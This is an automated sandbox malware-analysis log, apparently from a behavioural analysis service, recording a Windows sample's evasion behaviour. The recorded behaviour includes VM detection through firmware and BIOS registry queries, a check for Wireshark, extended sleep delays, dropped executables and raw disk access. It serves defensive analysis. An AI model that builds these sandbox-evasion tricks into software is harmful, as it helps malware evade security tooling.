            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSystem information queried: FirmwareTableInformationJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: SearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 44B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread delayed: delay time: 180000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread delayed: delay time: 300000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread delayed: delay time: 360000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread delayed: delay time: 1800000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread delayed: delay time: 900000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeWindow / User API: threadDelayed 7218Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 885Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 869Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeWindow / User API: threadDelayed 1806Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeWindow / User API: threadDelayed 1801Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeWindow / User API: threadDelayed 1775Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeWindow / User API: threadDelayed 1772Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeWindow / User API: threadDelayed 1741Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeWindow / User API: threadDelayed 1722Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeWindow / User API: threadDelayed 391Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeWindow / User API: threadDelayed 1700
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeWindow / User API: threadDelayed 1665
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeWindow / User API: threadDelayed 1667
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeWindow / User API: threadDelayed 1655
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeWindow / User API: threadDelayed 1663
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-8669
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeDropped PE file which has not been started: C:\taqcpb.exeJump to dropped file
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xlroe.exeJump to dropped file
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winysum.exeJump to dropped file
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xjjalq.exeJump to dropped file
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winbwxmuq.exeJump to dropped file
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7288Thread sleep count: 339 > 30Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7288Thread sleep time: -173568s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7304Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7316Thread sleep time: -62320s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7312Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7332Thread sleep time: -300000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7312Thread sleep time: -1080000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7320Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7440Thread sleep time: -540000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7440Thread sleep time: -91000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7448Thread sleep time: -260000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7448Thread sleep time: -6840000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7312Thread sleep time: -1800000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7316Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7300Thread sleep time: -174080s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7444Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7308Thread sleep time: -900000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7288Thread sleep count: 7218 > 30Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7288Thread sleep time: -3695616s >= -30000sJump to behavior
            Source: C:\Windows\System32\sihost.exe TID: 8092Thread sleep time: -32000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 5832Thread sleep time: -18060000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7192Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 6660Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 4504Thread sleep count: 1801 > 30Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 4504Thread sleep time: -18010000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 4460Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 1368Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 6384Thread sleep count: 1775 > 30Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 6384Thread sleep time: -17750000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 3800Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 4296Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 2664Thread sleep count: 1772 > 30Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 2664Thread sleep time: -17720000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7112Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 5660Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 6392Thread sleep count: 1741 > 30Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 6392Thread sleep time: -17410000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 2712Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 2704Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 3216Thread sleep count: 1722 > 30Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 3216Thread sleep time: -17220000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 6572Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 2052Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7224Thread sleep count: 391 > 30Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7224Thread sleep time: -3910000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 5976Thread sleep time: -300000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 8100Thread sleep time: -64432s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7912Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7912Thread sleep time: -360000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7904Thread sleep time: -30720s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 5844Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7824Thread sleep time: -7560000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7824Thread sleep time: -200000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7912Thread sleep time: -3600000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 6332Thread sleep time: -184320s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 6956Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7196Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7360Thread sleep count: 1700 > 30
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7360Thread sleep time: -17000000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 1660Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 1652Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7264Thread sleep count: 1665 > 30
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7264Thread sleep time: -16650000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7420Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 336Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 1912Thread sleep count: 1667 > 30
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 1912Thread sleep time: -16670000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 6024Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 1920Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 576Thread sleep count: 1655 > 30
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 576Thread sleep time: -16550000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 1916Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 744Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 3088Thread sleep count: 1663 > 30
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 3088Thread sleep time: -16630000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 1056Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7496Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\dllhost.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_01291060 Sleep,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,Sleep,lstrlen,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,lstrcpy,lstrcat,DeleteFileA,lstrcpy,lstrlen,lstrcmpiA,FindClose,Sleep,0_2_01291060
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_0128A2F5 Sleep,GetTempPathA,lstrlen,lstrcat,lstrlen,lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,Sleep,FindClose,Sleep,RtlExitUserThread,0_2_0128A2F5
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread delayed: delay time: 120000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread delayed: delay time: 62320Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread delayed: delay time: 180000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread delayed: delay time: 300000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread delayed: delay time: 120000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread delayed: delay time: 360000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread delayed: delay time: 1800000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread delayed: delay time: 900000Jump to behavior
            Source: SearchApp.exe, 0000000F.00000000.1602171177.000001F4AE805000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dx0ma3d6fxrucbibtqempqemuae&or=w
            Source: SearchApp.exe, 0000000F.00000000.1578753735.000001F49DA00000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1548558887.000001EC9A57D000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1546935176.000001EC9A1DA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1549685571.000001F49A708000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1598831598.000001F4AE68C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1585596585.000001F49DD9C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: var fbpkgiid = fbpkgiid || {}; fbpkgiid.page = '';;(function(BingAtWork) { if (typeof (bfbWsbTel) !== "undefined") { BingAtWork.WsbWebTelemetry.init({"cfg":{"e":true,"env":"PROD","t":"33d70a864599496b982a39f036f71122-2064703e-3a9d-4d90-8362-eec08dffe8e8-7176"},"ig":"751E9D17E4CD42EBAA6AE59A6ED5C22A","ConversationId":"5eff9dee-03ff-465e-bf2b-c48d3d202d68","LogicalId":"33366b5b-54ef-48bf-819d-677748eae9e3","tid":"651e6ab87a454702b15a8b0357a081d8","sid":"0017FC1997EE65330FCEEFB896C06426","uid":"","muid":"A92BA4E78D2946A0AFDA5029FA43D7A8","puid":null,"isMtr":false,"tn":null,"tnid":null,"msa":false,"mkt":"en-us","b":"edge","eref":"Ref A: 651e6ab87a454702b15a8b0357a081d8 Ref B: MWHEEEAP0024FD7 Ref C: 2023-10-05T07:50:16Z","vs":{"BAW10":"BFBLCLAZYCF","BAW11":"MSBSSVLMCF","BAW5":"MSBCUSTNONALL","BAW7":"BFBPROWSBINITT1","BAW9":"BCEPREC","CLIENT":"WINDOWS","COLUMN":"SINGLE","FEATURE.BFBCREFINER":"1","FEATURE.BFBLCLAZYCF":"1","FEATURE.BFBPROWSBINIT":"1","FEATURE.BFBPROWSBINITT1":"1","FEATURE.BFBWSBCM0921CF":"1","FEATURE.MSBCUSTNONALL":"1","FEATURE.MSBSSVLMCF":"1","FEATURE.MSNSBC2":"1","FEATURE.WSBREF-T":"1","MKT":"EN-US","MS":"0","NEWHEADER":"1","THEME":"THBRAND","UILANG":"EN"},"dev":"DESKTOP","os":"WINDOWS","osver":"11","dc":"CoreUX-Prod-MWHE01","canvas":"","sci":true,"isMidgardEnabled":true,"isHomepage":false,"snrVersion":"2023.10.04.39971431"}); } })(BingAtWork || (BingAtWork = {}));;_w.rms.js({'A:rms:answers:BoxModel:Framework':'https:\/\/r.bing.com\/rb\/18\/jnc,nj\/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w'});;
            Source: explorer.exe, 0000000A.00000002.2634147825.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
            Source: SearchApp.exe, 0000000F.00000000.1548558887.000001EC9A56A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: /rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;n
            Source: SearchApp.exe, 0000000F.00000000.1568102860.000001F49C520000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: hyper-v
            Source: explorer.exe, 0000000A.00000000.1450832815.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: dwm.exe, 00000005.00000000.1392615637.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dRomNECVMWarVMware_SATA_
